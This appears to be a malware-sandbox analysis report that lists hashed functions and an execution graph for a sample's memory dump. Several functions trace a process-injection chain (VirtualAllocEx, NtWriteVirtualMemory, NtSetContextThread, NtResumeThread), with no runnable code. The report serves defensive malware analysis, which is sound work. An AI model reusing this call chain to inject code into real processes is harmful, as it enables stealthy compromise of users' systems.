                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 72a022be842225df0188f089f172d1fee0b3d8c8c61dd499996d44a715124cfe
                                                • Instruction ID: 73c55ecb7f6c6b0ed779497c889d223b790a372027cadcc332f2ec4525cf4199
                                                • Opcode Fuzzy Hash: 72a022be842225df0188f089f172d1fee0b3d8c8c61dd499996d44a715124cfe
                                                • Instruction Fuzzy Hash: 66F1D274E04628CFEB24CFA9C885B9DBBB2BF49304F1481A9E819B7251D7349A85CF54
                                                Function 001A0B08 Relevance: 1.8, Strings: 1, Instructions: 555COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ;FW_
                                                • API String ID: 0-2086131256
                                                • Opcode ID: fa8c7b43be6fbc69c03786a7d232e46f845a3da86f4822d6987a20aec620aa01
                                                • Instruction ID: 19110ac62a47c79286c05819d2be0cf55662ba9678c99eb0a35ace297db1d5bc
                                                • Opcode Fuzzy Hash: fa8c7b43be6fbc69c03786a7d232e46f845a3da86f4822d6987a20aec620aa01
                                                • Instruction Fuzzy Hash: B1421678A001598FEB50DFA8C580A9EFBF2BF8A305F19C595D448AB252CB74DD81CF94
                                                Function 001A65A0 Relevance: 1.6, APIs: 1, Instructions: 119nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 627 1a65a0-1a6610 629 1a6612-1a6624 627->629 630 1a6627-1a6688 NtWriteVirtualMemory 627->630 629->630 632 1a668a-1a6690 630->632 633 1a6691-1a66e3 630->633 632->633
                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 001A6678
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: 6f6974ea286c0e05bd117136b731613510f3824f634dfd30c3046f7c5f1bb4e6
                                                • Instruction ID: 8ec22e150ad69229513733f066435031abe668f98de228baab25ac586bce9867
                                                • Opcode Fuzzy Hash: 6f6974ea286c0e05bd117136b731613510f3824f634dfd30c3046f7c5f1bb4e6
                                                • Instruction Fuzzy Hash: 7241CEB5D002589FDF00CFA9D984AEEFBF1BF49310F24942AE818B7250D335AA45CB54
                                                Function 001A65A8 Relevance: 1.6, APIs: 1, Instructions: 115nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 638 1a65a8-1a6610 640 1a6612-1a6624 638->640 641 1a6627-1a6688 NtWriteVirtualMemory 638->641 640->641 643 1a668a-1a6690 641->643 644 1a6691-1a66e3 641->644 643->644
                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 001A6678
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: 8608833f061cfddc9a0a86c1b8ab43f664eda0c1de99dd7db01f8373df65a665
                                                • Instruction ID: d716813aa59dc98db8428ec606c43b1f9c581975c80b22b7c9d6016d01046abb
                                                • Opcode Fuzzy Hash: 8608833f061cfddc9a0a86c1b8ab43f664eda0c1de99dd7db01f8373df65a665
                                                • Instruction Fuzzy Hash: 7541CCB5D002589FCF00CFA9D984AEEFBF1BF49310F24902AE818B7250D339AA45CB54
                                                Function 001A6250 Relevance: 1.6, APIs: 1, Instructions: 109nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 649 1a6250-1a631a NtReadVirtualMemory 652 1a631c-1a6322 649->652 653 1a6323-1a6375 649->653 652->653
                                                APIs
                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 001A630A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: MemoryReadVirtual
                                                • String ID:
                                                • API String ID: 2834387570-0
                                                • Opcode ID: 6771e2f6f32fbfabe1b2ed88245bd510cf0c45ebe07fc38387038ed99f2feab5
                                                • Instruction ID: cc04035aa4e0b750922f17a83f0a4ea253f28b85f3d630ba8190f010190cf859
                                                • Opcode Fuzzy Hash: 6771e2f6f32fbfabe1b2ed88245bd510cf0c45ebe07fc38387038ed99f2feab5
                                                • Instruction Fuzzy Hash: 1F41ACB9D002589FDF10CFA9D884AEEFBB1BF49310F14942AE814B7250C735A946CF65
                                                Function 001A6258 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 658 1a6258-1a631a NtReadVirtualMemory 661 1a631c-1a6322 658->661 662 1a6323-1a6375 658->662 661->662
                                                APIs
                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 001A630A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: MemoryReadVirtual
                                                • String ID:
                                                • API String ID: 2834387570-0
                                                • Opcode ID: ce2505a7ccd81ce8f58232d234517d1ad1e0bf78aacc07b813a3085059f1df7c
                                                • Instruction ID: 822c8391ac925e5ec9a05ff28576a2370197df27bfd1c63412583c9290b074bf
                                                • Opcode Fuzzy Hash: ce2505a7ccd81ce8f58232d234517d1ad1e0bf78aacc07b813a3085059f1df7c
                                                • Instruction Fuzzy Hash: 9941ACB9D002589FCF10CFA9D884AEEFBB1BF49310F14942AE818B7250D735AA45CF64
                                                Function 001A66F9 Relevance: 1.6, APIs: 1, Instructions: 97nativethreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 685 1a66f9-1a6760 687 1a6762-1a6774 685->687 688 1a6777-1a67bf NtSetContextThread 685->688 687->688 690 1a67c8-1a6814 688->690 691 1a67c1-1a67c7 688->691 691->690
                                                APIs
                                                • NtSetContextThread.NTDLL(?,?), ref: 001A67AF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: a7d1f2db431d5e4cd192449a5418a6c45ecebc2e5104b155a3b60b36dcae8e09
                                                • Instruction ID: 69805a0df587e3ab65e2d770d35cfe37480606471424819708686fc557562e59
                                                • Opcode Fuzzy Hash: a7d1f2db431d5e4cd192449a5418a6c45ecebc2e5104b155a3b60b36dcae8e09
                                                • Instruction Fuzzy Hash: 3B41BEB4D002589FDB10CFA9D884AEEFBF1BF49314F24842AE419B7250D7389A49CF54
                                                Function 001A6700 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 696 1a6700-1a6760 698 1a6762-1a6774 696->698 699 1a6777-1a67bf NtSetContextThread 696->699 698->699 701 1a67c8-1a6814 699->701 702 1a67c1-1a67c7 699->702 702->701
                                                APIs
                                                • NtSetContextThread.NTDLL(?,?), ref: 001A67AF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: 01b875b25e1a659c693b5125a4bb257e52313ae5397853881a85816e8b0cffba
                                                • Instruction ID: 18f9acebf021ba33bfda67e838f6d22e2da15a11027d0bf5cf2fa7efbe195cdb
                                                • Opcode Fuzzy Hash: 01b875b25e1a659c693b5125a4bb257e52313ae5397853881a85816e8b0cffba
                                                • Instruction Fuzzy Hash: 4631BCB4D002589FDB10CFA9D884AEEFBF1BF49314F24802AE419B7250D778AA49CF54
                                                Function 001A6381 Relevance: 1.6, APIs: 1, Instructions: 84nativethreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 707 1a6381-1a6421 NtResumeThread 711 1a642a-1a646e 707->711 712 1a6423-1a6429 707->712 712->711
                                                APIs
                                                • NtResumeThread.NTDLL(?,?), ref: 001A6411
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: df32b5003d92985c06435bb893b28a3e42dc0806bbb631e31288b9a03e3f8c3d
                                                • Instruction ID: 60c36d54d0ee3ef78e9d34082d44acce56f3543a8458d0dfe5f6b2aa529ec446
                                                • Opcode Fuzzy Hash: df32b5003d92985c06435bb893b28a3e42dc0806bbb631e31288b9a03e3f8c3d
                                                • Instruction Fuzzy Hash: 8E31CBB9D002189FDB10CFA9D884ADEFBB5FF49310F24942AE815B7240D775AA46CB54
                                                Function 001A6388 Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 717 1a6388-1a6421 NtResumeThread 720 1a642a-1a646e 717->720 721 1a6423-1a6429 717->721 721->720
                                                APIs
                                                • NtResumeThread.NTDLL(?,?), ref: 001A6411
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: a632be034871403156b450a25cdca945fc9fc0e45cc40d53e5baa05df5269853
                                                • Instruction ID: e5c628eb1c1cdb4635248b5f13e555b1ae284cdb6b6ecb4fc8ad5d08ee3eb2be
                                                • Opcode Fuzzy Hash: a632be034871403156b450a25cdca945fc9fc0e45cc40d53e5baa05df5269853
                                                • Instruction Fuzzy Hash: 0531BDB4D012189FDF10CFA9D984A9EFBB1FF49310F24942AE815B7200D775A945CF54
                                                Function 001A1EC9 Relevance: .5, Instructions: 514COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e27ebdf4a25de35ccee07be5d6565244b7ecdde32be09dce42f4f9c294b2bc7
                                                • Instruction ID: 84cedc40b15f1c83db7b2fe7e75e11dacfec0d74c06019cef7c46d851a35fc1e
                                                • Opcode Fuzzy Hash: 0e27ebdf4a25de35ccee07be5d6565244b7ecdde32be09dce42f4f9c294b2bc7
                                                • Instruction Fuzzy Hash: 5A429178E01229CFDB54CFA9C984B9DBBB2BF49310F1581A9D809A7365D734AE81CF50
                                                Function 001A4358 Relevance: .2, Instructions: 154COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae54cd9a540d313bcc6cb4f8b897eddada8e9236465cd8c4d44821182d520e66
                                                • Instruction ID: f28c0f851f9725cdc9fa8946382080d92651d7d3e632f06db6731d8dcc88e917
                                                • Opcode Fuzzy Hash: ae54cd9a540d313bcc6cb4f8b897eddada8e9236465cd8c4d44821182d520e66
                                                • Instruction Fuzzy Hash: A161B674E00208DFDB58DFA9D995A9DBBF2FF89300F24806AE415AB365DB30A901CF10
                                                Function 001A6481 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 667 1a6481-1a6542 VirtualAllocEx 670 1a654b-1a6595 667->670 671 1a6544-1a654a 667->671 671->670
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001A6532
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: a171e110de1326d6678a2680f02e872c4dcee5fca9fe1ac88ecdd7d747a6fd01
                                                • Instruction ID: 5cc2bc374fb44f1d27c416ef68810fa1d87f58a88a5d236c2fee16da39f33703
                                                • Opcode Fuzzy Hash: a171e110de1326d6678a2680f02e872c4dcee5fca9fe1ac88ecdd7d747a6fd01
                                                • Instruction Fuzzy Hash: DC3198B9D002589FDF10CFA9D884AEEFBB1BF49310F24942AE815B7250D735AA06CF54
                                                Function 001A6488 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 676 1a6488-1a6542 VirtualAllocEx 679 1a654b-1a6595 676->679 680 1a6544-1a654a 676->680 680->679
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001A6532
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 4e2cb4e2d9b79e87c6e25758baad7116c9aaad6e9dfa972fe123e9a2a666d390
                                                • Instruction ID: 730de16a1fa88b960194bb670e357d7f2d9cdfd3cac7017274cc7855167f95e1
                                                • Opcode Fuzzy Hash: 4e2cb4e2d9b79e87c6e25758baad7116c9aaad6e9dfa972fe123e9a2a666d390
                                                • Instruction Fuzzy Hash: 8B31AAB9D002589FCF10CFA9D884AEEFBB1BF49310F24942AE815B7210D735A906CF54

                                                Non-executed Functions

                                                Function 001A4050 Relevance: .2, Instructions: 238COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3edadc241ef7a4dc02506429a0f08e584ff64e155ca871610a295d59517f38c7
                                                • Instruction ID: 28daacf59749a61638bbb3cfcc4aed5d87b9d39fabe71ee8e2e8d323e6a72d99
                                                • Opcode Fuzzy Hash: 3edadc241ef7a4dc02506429a0f08e584ff64e155ca871610a295d59517f38c7
                                                • Instruction Fuzzy Hash: B7B1C874E002198FDB14DFA9C991A9DFBF2BF89300F24C16AE419AB355DB34A942CF50
                                                Function 001A403F Relevance: .2, Instructions: 198COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4beed6a3329e38cd9f1ad3b1051500c46fe8738f764557dd3f7f643c1a0c5c40
                                                • Instruction ID: 49a8175033c19eb6e8ec5c413f49036f4cd40021d383463fe983e302591333de
                                                • Opcode Fuzzy Hash: 4beed6a3329e38cd9f1ad3b1051500c46fe8738f764557dd3f7f643c1a0c5c40
                                                • Instruction Fuzzy Hash: 0791C874E002188FDB54CFA9C985A9DFBF2BF89300F24C16AE419AB355DB34A942CF50

                                                Execution Graph

                                                Execution Coverage:9.7%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:6%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:62
                                                execution_graph 10122 413251 10123 401052 10122->10123 10124 413272 GetTempPathW lstrcatW 10123->10124 10125 4035e5 4 API calls 10124->10125 10126 4132a7 10125->10126 10127 403437 3 API calls 10126->10127 10128 4132af 10127->10128 10137 405ea5 VirtualFree 10128->10137 10130 4132b7 10138 403761 10130->10138 10137->10130 10139 403384 lstrlenW 10138->10139 10140 403774 10139->10140 10141 402f91 6 API calls 10140->10141 10142 403785 10141->10142 10143 403384 lstrlenW 10142->10143 10144 40378e 10143->10144 10145 402f91 6 API calls 10144->10145 10146 403798 10145->10146 10147 403679 10146->10147 10148 402f91 6 API calls 10147->10148 10149 40369c 10148->10149 10150 402f91 6 API calls 10149->10150 10151 4036af 10150->10151 10152 402f91 6 API calls 10151->10152 10153 4036c1 10152->10153 10154 402f91 6 API calls 10153->10154 10155 4036cc 10154->10155 10156 40304c 2 API calls 10155->10156 10157 4036d5 10156->10157 10158 403665 10157->10158 10159 403036 2 API calls 10158->10159 10160 403670 10159->10160 13243 40ed5b 13244 4033f5 3 API calls 13243->13244 13245 40ed71 13244->13245 13254 404a75 13245->13254 13248 404f2b 15 API calls 13249 40ed82 13248->13249 13263 404a17 13249->13263 13253 40ed92 13255 40309d 10 API calls 13254->13255 13256 404a93 13255->13256 13257 403437 3 API calls 13256->13257 13258 404a9c 13257->13258 13267 405ea5 VirtualFree 13258->13267 13260 404aa4 13268 405ea5 VirtualFree 13260->13268 13262 404ab0 13262->13248 13269 405ea5 VirtualFree 13263->13269 13265 404a28 13266 405ea5 VirtualFree 13265->13266 13266->13253 13267->13260 13268->13262 13269->13265 13281 403962 13282 40397a 13281->13282 13283 411dc0 11 API calls 13281->13283 13284 403437 3 API calls 13282->13284 13283->13282 13285 403984 13284->13285 13288 405ea5 VirtualFree 13285->13288 13287 40398c 13288->13287 13289 403d66 13290 411dc0 11 API calls 13289->13290 13291 403d91 13290->13291 13292 403437 3 API calls 13291->13292 13293 403d9b 13292->13293 13302 405ea5 VirtualFree 13293->13302 13295 403da3 13296 402e4c 8 API calls 13295->13296 13297 403dca 13296->13297 13298 402e93 2 API calls 13297->13298 13299 403dd3 13298->13299 13300 403036 2 API calls 13299->13300 13301 403ddb 13300->13301 13302->13295 13317 403d6c 13318 403d91 13317->13318 13319 411dc0 11 API calls 13317->13319 13320 403437 3 API calls 13318->13320 13319->13318 13321 403d9b 13320->13321 13330 405ea5 VirtualFree 13321->13330 13323 403da3 13324 402e4c 8 API calls 13323->13324 13325 403dca 13324->13325 13326 402e93 2 API calls 13325->13326 13327 403dd3 13326->13327 13328 403036 2 API calls 13327->13328 13329 403ddb 13328->13329 13330->13323 13343 401d70 13348 405ea5 VirtualFree 13343->13348 13345 401d83 13349 405ea5 VirtualFree 13345->13349 13347 401d8e 13348->13345 13349->13347 10243 402473 10246 412217 10243->10246 10251 412c91 10246->10251 10248 412229 10249 412235 10248->10249 10254 412bf3 10248->10254 10252 412c9c 10251->10252 10253 412cfc CoUninitialize 10252->10253 10253->10248 10255 412c91 CoUninitialize 10254->10255 10258 412bfe 10255->10258 10256 412c27 10256->10249 10257 405ca3 3 API calls 10257->10258 10258->10256 10258->10257 10260 412f63 10258->10260 10263 405ea5 VirtualFree 10260->10263 10262 412f6d 10263->10262 10295 403807 10296 403813 10295->10296 10297 411dc0 11 API calls 10296->10297 10298 40382b 10297->10298 10299 403437 3 API calls 10298->10299 10300 403835 10299->10300 10303 405ea5 VirtualFree 10300->10303 10302 40383d 10303->10302 10304 404c0a 10305 404c1d 10304->10305 10322 404c64 10304->10322 10306 404c29 10305->10306 10309 404d56 10305->10309 10307 404d4a 10306->10307 10308 404c2f 10306->10308 10625 40c938 10307->10625 10312 404c38 10308->10312 10313 404cdf 10308->10313 10310 404dce 10309->10310 10317 404d66 10309->10317 10318 404dc8 10309->10318 10335 404ddf 10309->10335 10809 4026c4 10310->10809 10314 404cd3 10312->10314 10315 404c3e 10312->10315 10319 404d40 10313->10319 10320 404ce4 10313->10320 10541 4029fb 10314->10541 10323 404c43 10315->10323 10324 404c9b 10315->10324 10316 404e35 10872 402968 10316->10872 10328 404d6d 10317->10328 10329 404dbe 10317->10329 10778 4027d3 10318->10778 10612 4029b3 10319->10612 10330 404d32 10320->10330 10331 404ceb 10320->10331 10336 404c45 10323->10336 10337 404c8f 10323->10337 10345 404ca0 10324->10345 10346 404cc7 10324->10346 10326 404df3 10338 404e20 10326->10338 10339 404dfa 10326->10339 10327 404e29 10861 402686 10327->10861 10340 404d71 10328->10340 10341 404db3 10328->10341 10769 40990a InitializeCriticalSection DeleteCriticalSection EnterCriticalSection GetModuleHandleA 10329->10769 10603 41239e 10330->10603 10342 404d28 10331->10342 10343 404cef 10331->10343 10335->10316 10335->10322 10335->10326 10335->10327 10349 404c4a 10336->10349 10350 404c7d 10336->10350 10473 402be5 10337->10473 10855 402650 10338->10855 10351 404e19 10339->10351 10352 404dfe 10339->10352 10353 404d9c 10340->10353 10367 404d90 10340->10367 10368 404d79 10340->10368 10763 4098c4 EnterCriticalSection 10341->10763 10597 412367 10342->10597 10354 404cf3 10343->10354 10355 404d1e 10343->10355 10360 404ca7 10345->10360 10361 404cbb 10345->10361 10516 402af6 SetLastError 10346->10516 10363 404c51 10349->10363 10364 404c73 10349->10364 10433 402cec 10350->10433 10852 402639 10351->10852 10365 404e10 10352->10365 10366 404e03 10352->10366 10655 40e3fa InitializeCriticalSection DeleteCriticalSection EnterCriticalSection 10353->10655 10369 404cfb 10354->10369 10370 404e4e 10354->10370 10594 40298b 10355->10594 10360->10322 10478 402a10 10360->10478 10501 402aa1 10361->10501 10376 404c55 10363->10376 10377 404c69 10363->10377 10420 402c8e 10364->10420 10839 4025cb 10365->10839 10366->10322 10822 402b80 10366->10822 10642 40275a 10367->10642 10368->10322 10633 40d328 EnterCriticalSection 10368->10633 10378 404d12 10369->10378 10379 404cff 10369->10379 10877 402961 10370->10877 10376->10322 10392 402bf4 10376->10392 10407 402c47 10377->10407 10570 4028cf 10378->10570 10379->10322 10546 413936 10379->10546 10393 40362d 3 API calls 10392->10393 10394 402c09 10393->10394 10896 40ff27 10394->10896 10405 402c44 10405->10322 10406 401ad5 VirtualFree 10406->10405 10980 41002b 10407->10980 10409 402c58 11002 4013a8 10409->11002 10414 404f2b 15 API calls 10415 402c76 10414->10415 11013 40451b 10415->11013 10418 402c8b 10418->10322 11049 410d24 10420->11049 10422 402ca0 11077 40131a 10422->11077 10427 404f2b 15 API calls 10428 402cbe 10427->10428 11088 404624 10428->11088 10430 402ce8 10430->10322 10432 402cc6 10432->10430 11092 401416 10432->11092 11125 40f93f 10433->11125 10438 411e21 6 API calls 10439 402d32 10438->10439 10440 4035e5 4 API calls 10439->10440 10441 402d58 10440->10441 10442 4035e5 4 API calls 10441->10442 10443 402d61 10442->10443 11144 40fa1f GlobalMemoryStatusEx 10443->11144 10445 402d66 10446 4035e5 4 API calls 10445->10446 10447 402d77 10446->10447 11145 40fc7e GetComputerNameW 10447->11145 10450 40fc58 3 API calls 10451 402d84 10450->10451 10452 40fbfc 4 API calls 10451->10452 10453 402d8a 10452->10453 11148 40fa42 LoadLibraryA 10453->11148 11224 4012ad 10473->11224 10477 402bf3 10477->10322 10479 4033bf 4 API calls 10478->10479 10480 402a29 10479->10480 11388 4033a3 lstrcmpA 10480->11388 10482 402a31 11389 405ea5 VirtualFree 10482->11389 10484 402a4c 10485 402a50 10484->10485 10486 402a58 10484->10486 11390 40edb5 10485->11390 10488 4033bf 4 API calls 10486->10488 10489 402a65 10488->10489 11401 4033a3 lstrcmpA 10489->11401 10491 402a6d 11402 405ea5 VirtualFree 10491->11402 10493 402a77 10494 402a7b 10493->10494 10495 402a8e 10493->10495 11403 40ea89 10494->11403 11419 4033f5 10495->11419 10499 402a56 10499->10322 11537 410cf6 OpenProcess 10501->11537 10503 402ab6 10504 402ac5 GetLastError 10503->10504 10505 402aba 10503->10505 10507 402ac1 10504->10507 10506 402c8e 38 API calls 10505->10506 10506->10507 11540 410c79 CreateToolhelp32Snapshot 10507->11540 10509 402ad8 11548 404346 10509->11548 10512 404f2b 15 API calls 10513 402ae9 10512->10513 11553 40432f 10513->11553 10517 40362d 3 API calls 10516->10517 10518 402b18 10517->10518 11558 40ff0b DeleteFileW 10518->11558 10520 402b1d 10521 402b51 GetLastError 10520->10521 10522 402b22 10520->10522 10523 402b4f 10521->10523 10524 40362d 3 API calls 10522->10524 10525 40362d 3 API calls 10523->10525 10526 402b2b 10524->10526 10527 402b62 10525->10527 10528 40362d 3 API calls 10526->10528 11570 403fcb 10527->11570 10530 402b37 10528->10530 11561 4039b5 10530->11561 10534 404f2b 15 API calls 10536 402b73 10534->10536 11575 403fb4 10536->11575 10537 402b47 11567 40399e 10537->11567 10542 4012ad 3 API calls 10541->10542 10543 402a07 10542->10543 10544 407574 24 API calls 10543->10544 10545 402a0e 10544->10545 10545->10322 10547 40304c 2 API calls 10546->10547 10548 41394d 10547->10548 10549 413959 10548->10549 10550 413ae8 10548->10550 10551 413962 10549->10551 10552 413aa6 10549->10552 10557 402f91 6 API calls 10550->10557 10553 41396b 10551->10553 10554 413a5d 10551->10554 10559 402f91 6 API calls 10552->10559 10555 413a14 10553->10555 10556 413974 10553->10556 10560 402f91 6 API calls 10554->10560 10564 402f91 6 API calls 10555->10564 10558 4139cb 10556->10558 10568 413979 10556->10568 10565 4139a8 10557->10565 10566 402f91 6 API calls 10558->10566 10559->10565 10560->10565 10561 413b2e 10563 403036 2 API calls 10561->10563 10562 413b28 SetEvent 10562->10561 10567 413b36 10563->10567 10564->10565 10565->10561 10565->10562 10566->10565 10567->10322 10568->10561 10569 402f91 6 API calls 10568->10569 10569->10565 10571 40362d 3 API calls 10570->10571 10572 4028e7 10571->10572 11583 410203 10572->11583 10575 40362d 3 API calls 10576 4028f8 PathFileExistsW 10575->10576 11590 405ea5 VirtualFree 10576->11590 10578 40290b 10579 402910 10578->10579 10580 40291b 10578->10580 11591 4101d1 CreateFileW 10579->11591 10582 410192 2 API calls 10580->10582 10583 402919 10582->10583 10584 402955 10583->10584 10586 40304c 2 API calls 10583->10586 10585 40feed 4 API calls 10584->10585 10587 40295d 10585->10587 10588 402938 10586->10588 10587->10322 10589 41013d 4 API calls 10588->10589 10590 402945 10589->10590 10591 403036 2 API calls 10590->10591 10592 40294d 10591->10592 10593 410125 CloseHandle 10592->10593 10593->10584 10595 404f2b 15 API calls 10594->10595 10596 4029a0 10595->10596 10596->10322 11595 41026f WaitForSingleObject 10597->11595 10599 412371 10600 412391 ReleaseMutex 10599->10600 10601 412c91 CoUninitialize 10599->10601 10600->10322 10602 41238a 10601->10602 10602->10600 11596 41026f WaitForSingleObject 10603->11596 10605 4123ab 10606 4123f8 ReleaseMutex 10605->10606 10611 4123d2 10605->10611 11597 405f53 GetProcessHeap HeapAlloc 10605->11597 10606->10322 10609 4123c6 10610 412ed4 20 API calls 10609->10610 10609->10611 10610->10611 11598 412d0a CoInitialize CoCreateInstance 10611->11598 11615 41223e 10612->11615 10619 404f2b 15 API calls 10620 4029e3 10619->10620 11643 40479b 10620->11643 10623 4029f8 10623->10322 10626 40c945 10625->10626 10627 40c94b 10625->10627 11683 401a7e 10626->11683 11687 405eff GetProcessHeap RtlAllocateHeap 10627->11687 10630 40c964 11688 401f4b CreateThread 10630->11688 10632 40c987 10632->10322 11699 401f76 10633->11699 10636 401f76 2 API calls 10637 40d34f 10636->10637 11702 405584 shutdown closesocket 10637->11702 10639 40d357 11703 405584 shutdown closesocket 10639->11703 10641 40d362 